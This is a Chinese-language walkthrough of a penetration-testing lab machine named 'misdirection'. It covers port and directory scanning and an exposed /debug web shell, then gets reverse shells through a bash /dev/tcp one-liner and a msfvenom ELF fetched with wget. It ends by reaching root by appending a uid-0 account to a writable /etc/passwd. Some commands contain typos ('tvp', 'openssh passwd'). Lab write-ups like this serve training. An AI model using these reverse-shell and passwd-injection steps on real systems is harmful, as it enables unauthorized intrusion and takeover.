K____k
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9

目录
- 一、信息收集
- 二、web渗透
- 三、反弹shell
- 四、用户提权
- 五、root提权
一、信息收集
拿到靶机后,老规矩,使用nmap进行详细扫描,这里我的kali本机ip是192.168.138.133
先扫描ip网段,252则是靶机ip
接着是靶机的端口
信息收集到这里我的大概思路就是在页面中寻找有用信息,后通过mysql连接数据库或者使用sqlmap爆破获取用户信息
接下来是对靶机端口详细扫描
还有靶机漏洞扫描,这里扫描出来的一些目录对我们打靶有很大的帮助
这里8080端口里面的目录一会对于渗透有很大的帮助
既然有80和8080端口,肯定少不了目录扫描,这里使用dirsearch对靶机进行目录扫描
二、web渗透
这里扫描完成后发现了不对劲,扫出来的目录太多了,去页面上看看
这里不好获取信息,后来我去登录注册页面尝试以后也没有发现sql注入
这是我联想到了靶机名称就是misdirection,这个80页面的信息可能在误导我们,然后我就去尝试nmap漏洞扫描的漏洞,发现8080端口下的/debug是一个页面shell
这就好办了,通过这个页面我们可以获得反弹shell,这里有两个方式获取反弹shell
三、反弹shell
1.在页面中输入 /bin/bash -c ‘bash -i >& /dev/tvp/192.168.138.133/1234 0>&1’
然后在kali本机上nc -lvnp 1234即可获得反弹shell
2. 在kali上使用msf制作脚本,然后开启http服务,后在页面上wget拉取脚本,赋予执行权限,kali上nc监听,即可获得反弹shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.138.133 LPORT=53 -f elf > shell.elf
python3 -m http.server
wget 192.168.138.133:8000/shell.elf
chmod +x shell.elf赋予执行权限
nc -lvnp 53 先在kali上进行nc监听,再执行脚本
./shell.elf
然后拉取shell文件,并赋予执行权限,在kali上监听,再执行文件,即可获得反弹shell
获得shell后输入python -c 'import pty;pty.spawn("/bin/bash")' 获取交互式shell
四、用户提权
拿到shell后sudo -l发现可以拿到用户brexit的shell
我们cat /etc/passwd 发现brexit用户为1000
可以输入sudo -u#1000 /bin/bash 或者 sudo -u brexit /bin/bash 获取brexit权限
五、root提权
进入brexit用户后sudo -l命令需要密码,但是刚才我们查看passwd权限时,发现用户组是brexit,且具有读写权限
这就好办了,我们可以通过修改或者添加用户来提权,这里我用openssh生成密码,创建新用户输入到/etc/passwd里面
这里使用openssl生成密码1
openssh passwd -1 "1"
echo 'k1:$1$wPgAKbbR$Fz3jjvbnZmdaOpA7DvJj0/:0:0:root:/root:/bin/bash' >> /etc/passwd
输入到/etc/passwd里面,su k1即刚才我们创建的用户,输入密码,成功获取root权限
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)